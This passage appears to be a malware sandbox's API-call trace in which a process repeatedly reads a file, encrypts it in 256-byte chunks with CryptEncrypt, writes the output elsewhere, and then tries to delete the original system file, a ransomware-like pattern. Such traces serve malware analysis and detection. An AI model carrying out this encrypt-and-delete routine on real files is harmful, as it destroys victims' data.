dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.181] GetLastError () returned 0x0 [0148.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.181] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.181] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.181] GetLastError () returned 0x0 [0148.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.181] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.181] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.181] GetLastError () returned 0x0 [0148.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.181] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.181] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.181] GetLastError () returned 0x0 [0148.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.181] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.182] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.182] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.182] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.182] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.182] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.182] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.182] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.182] GetLastError () returned 0x0 [0148.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.183] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.183] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.183] GetLastError () returned 0x0 [0148.183] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.183] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.183] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.183] GetLastError () returned 0x0 [0148.183] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.183] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.183] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.183] GetLastError () returned 0x0 [0148.183] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.183] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.183] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.183] GetLastError () returned 0x0 [0148.183] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.183] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.183] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.183] GetLastError () returned 0x0 [0148.183] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.183] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.184] GetLastError () returned 0x0 [0148.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.184] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.184] GetLastError () returned 0x0 [0148.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.184] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.184] GetLastError () returned 0x0 [0148.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.184] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.184] GetLastError () returned 0x0 [0148.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.184] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.184] GetLastError () returned 0x0 [0148.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.184] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.184] GetLastError () returned 0x0 [0148.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.184] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.184] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.185] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.185] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.185] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.185] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.185] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.185] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.185] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.185] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.185] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.185] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.185] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.185] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.185] GetLastError () returned 0x0 [0148.185] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.186] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.186] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.186] GetLastError () returned 0x0 [0148.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.186] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.186] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.186] GetLastError () returned 0x0 [0148.186] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.186] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.186] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0148.186] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.186] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 1 [0148.187] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0 [0148.187] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" | 